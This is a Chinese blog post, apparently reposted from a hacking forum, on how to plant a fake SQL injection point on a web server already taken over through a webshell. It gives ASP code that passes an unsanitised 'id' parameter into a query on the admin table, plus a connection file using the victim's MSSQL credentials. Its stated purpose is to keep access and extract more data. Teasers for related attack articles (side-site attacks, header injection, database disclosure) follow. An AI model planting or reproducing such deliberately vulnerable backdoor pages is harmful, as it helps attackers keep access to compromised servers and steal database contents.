自己伪造注入点方便渗透

最新推荐文章于 2021-08-25 15:40:19 发布
最新推荐文章于 2021-08-25 15:40:19 发布
阅读量2.2k 收藏
点赞数 1
文章标签: 数据库 security database include 服务器 user
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息

这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!

首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和

密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表

因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:

程序代码 程序代码
<!--#include file="xx.asp"-->
<%
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id
rs.open strSQL,conn,1,3
rs.close
%>


把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在

你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!

然后就要构造一个连接数据库的文件了,代码如下:
程序代码 程序代码
<%        
strSQLServerName = "000.000.000.000"     '服务器名称或地址
strSQLDBUserName = "sqlname"         '数据库帐号
strSQLDBPassword = "sqlpass"         '数据库密码
strSQLDBName = "sqldataname"           '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
%>



这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,

就这样,正常情况下,就OK了,伪造成功……

           如果有什么问题可以提出来大家一起探讨解决。
 

下面是构造的好示例:

<%       
strSQLServerName = "000.000.000.000"     '服务器名称或地址
strSQLDBUserName = "sqlname"         '数据库帐号
strSQLDBPassword = "sqlpass"         '数据库密码
strSQLDBName = "sqldataname"           '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
%>

存为XX.asp就行!~这里的文件名要和INCLUDE相同

retty85
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
注入 就旁注
LiBai'S BLOG
05-22 5184
圈起来的要考 技术背景 在渗透中,当渗透网站不存在漏洞或找不到注入点时,可以采用旁注或C段思路进行渗透。 网站简单结构 旁注:同服务器不同站点 网站A无法渗透,可以通过旁注查询获取网站B及其它网站地址,渗透其它网站转而再渗透A。 权限足够的话,直接跨目录写webshell,权限不够的话,尝试webshell提权获取服务器权限,即渗透网站A成功! C段:同网段不同服务器不同站点 旁注方案失败的情况(独立网站服务器或其它网站渗透不成功),通过C段查询获取同网段上服务器解析的站点进行渗透,再进行we
SQL注入-注入点判断
渗透笔记
01-11 2万+
1.注入点判断 传入SQL语句可控参数分为两类 1. 数字类型,参数不用被引号括起来,如?id=1 2. 其他类型,参数要被引号扩起来,如?name="phone" 判断某个链接是否存在SQL注入,可以通过对其传入的可控参数进行简单的构造,通过服务端返回的内容来判断有无注入 其他类型 构造测试 预期结果
Android中的so注入(inject)和挂钩(hook) - For both x86 and arm
热门推荐
世事难料,保持低调
08-11 7万+
对于Android for arm上的so注入(inject)和挂钩(hook),网上已有牛人给出了代码-libinject(http://bbs.pediy.com/showthread.php?t=141355)。由于实现中的ptrace函数是依赖于平台的,所以不经改动只能用于arm平台。本文将之扩展了一下,使它能够通用于Android的x86和arm平台。Arm平台部分基本重用了libinject中的代码,其中因为汇编不好移植且容易出错,所以把shellcode.s用ptrace_call替换掉了,另
渗透之——SQL注入点检测方法
冰河的专栏
12-09 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84929699 现在有很多防注入程序屏蔽了 and、1=1、1=2 类似这样的关键字,使用这样的方法有时不能探测到注入点了。那么是否有新的方法能够探测注入点呢? 经过一段时间的研究,发现了更好的方法。特此共享一下。 现在假设有一个新闻页面,URL 是 http://192.168...
火狐浏览器渗透专版
02-13
火狐浏览器渗透专版是一款专为网络安全测试和渗透测试设计的定制化版本,它整合了火狐社区中最新的主流渗透测试插件。这款浏览器不仅具备普通网页浏览功能,还为安全专家提供了强大的工具集,帮助他们在合法的情况下...
Firefox渗透专用.zip
12-23
1. **伪造IP、Refer、X-Forward工具**:在渗透测试过程中,测试人员可能需要隐藏自己的真实身份或位置,以便更接近实际攻击者的视角。伪造IP工具允许改变发送请求的源IP地址, Refer和X-Forward工具则用于修改HTTP头...
超全的Web渗透自我学习资料合集(64篇).zip
09-30
web渗透: 服务器端包含注入(SSI注入) web渗透: XPath注入 web渗透: 命令注入 web渗透: HTTP响应头拆分漏洞 web渗透: LDAP注入 web渗透: ORM注入 web渗透: Json劫持Json注入 web渗透: 宽字节注入 web渗透: 脆弱的...
web渗透系列教学下载共64份.zip
12-30
web渗透--25--服务器端包含注入(SSI注入).pdf web渗透--26--XPath注入.pdf web渗透--27--命令注入.pdf web渗透--28--HTTP响应头拆分漏洞.pdf web渗透--29--LDAP注入.pdf web渗透--3--自动化漏洞扫描.pdf web渗透--...
渗透测试初级面试题(二)
09-15
回答指出,XSS 是跨站脚本攻击,CSRF 是跨站请求伪造攻击,XXE 是 XML 外部实体注入攻击。这些攻击方式都可以导致严重的安全问题,需要采用相关的修复方式来防范。 问题 6 中讨论的是 3389 端口无法连接的几种情况...
搜索型注入点的找寻和注入方法
自由无限
08-18 3591
 转自:http://hi.baidu.com/wowobar/blog/item/9d13ab2f84c8ba584ec226d8.html目前,一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在,常见的搜索功能代码如下:..................keywo
渗透技巧——手动判断注入点(思维导图)
Thunderclap的博客
08-25 555
渗透测试过程中,在web存在较复杂的情况下需要有针对性的先进性手动测试是否存在注入点,总结如下手动测试思维导图,如下思维导图针对大多数有注入点的场景。
X-Forwarded-For注入实战
qq_38807738的博客
06-06 6659
X-Forwarded-For注入漏洞实战1、使用BurpSuite抓包POST /index.php HTTP/1.1Host: 219.153.49.228:47065User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0Accept: text/html,application...
史上最全的渗透测试面试题,都是干货。
m0_48368237的博客
01-30 7679
1、拿到一个待检测的站或给你一个网站,你觉得应该先做什么? 一、信息收集 1.获取域名的whois信息,获取注册者邮箱姓名电话等。 2.通过站长之家、明小子、k8等查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。 3、通过DNS域传送漏洞、备份号查询、SSl证书、APP、微信公众号、暴力破解、DNS历史记录、K8 C段查询、Jsfinder、360或华为威胁情报、证书序列号获取企业域名与ip。 4.通过Nmap、Wappalyzer、御剑等查看服务器操作系统
没有注入点,如何拿站
legends2012的专栏
12-25 4173
<br />邪八的一篇文章<br />1爆库 <br />原理: <br />"%5c"暴库法,它不是网页本身的漏洞,而是利用了iis解码方式中的一个特性,如果iis安全设置不周全,而网页设计者未考虑IIS错误,就会被人利用。 为何要用"%5c"?它实际上是"/"的十六进制代码,也就是"/"的另一种表示法。当我们把"/"换成十六进制写法"%5c"时,ie不会对此进行转换。地址中的"%5c"被原样提交了.当iis收到后解析时,又会将%5c还原成"/",所有调用数据库的连接文件中都有Server.MapPath
Rs.Open和Conn.Execute的详解和区别及&H0001的说明
jinxbin的专栏
01-10 7664
来源:www.asp163.org 1. Rs.Open SQL,Conn,A,B,C<br />2. Conn.Execute(SQL,RowsAffected,C)<br /> 一、Conn.Execute(SQL,RowsAffected,C)<br /> <br />参数含义:<br />SQL的值可以是SQL语句、表名、存储过程名,也可以是数据提供者所能接受的任意字符串。为了提高性能,最好为C参数指定合适的值<br />可选参数RowsAffected<br />1、一个Insert、Update
注入点查找工具黑客python
blotemj.blog.csdn.net
07-05 1740
python SQL Injection Scaner #!/usr/bin/python #-*-coding=utf-8-*- #Example site:@http://www.apostilando.com/pagina.php?cod=1 #将要扫描的网站写入当前目录文件中。python xxx.py xxx.txt import urllib import os impor...
墨者学院 - IP地址伪造(第1题)
多崎巡礼的博客
08-04 1727
猜用户密码 得到 用户:admin        密码:admin 登陆时提示 只允许在服务器上登陆 则需要伪装ip地址 方法一:需要工具                      : 火狐浏览器                     :X-Forwarded-For Header 使用X-Forwarded-For Header进行伪造 输入常见弱密码 admin admin 即可 ...
eLearnSecurity eWPT Notes.pdf
最新发布
10-06
网络安全渗透测试是现代信息技术领域中的重要实践技能,尤其在Web应用程序安全方面,它涉及到对系统漏洞的发现、评估...通过理解和应用这些知识点,学习者可以提升自己的安全防御能力,同时对安全漏洞有更深入的理解。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值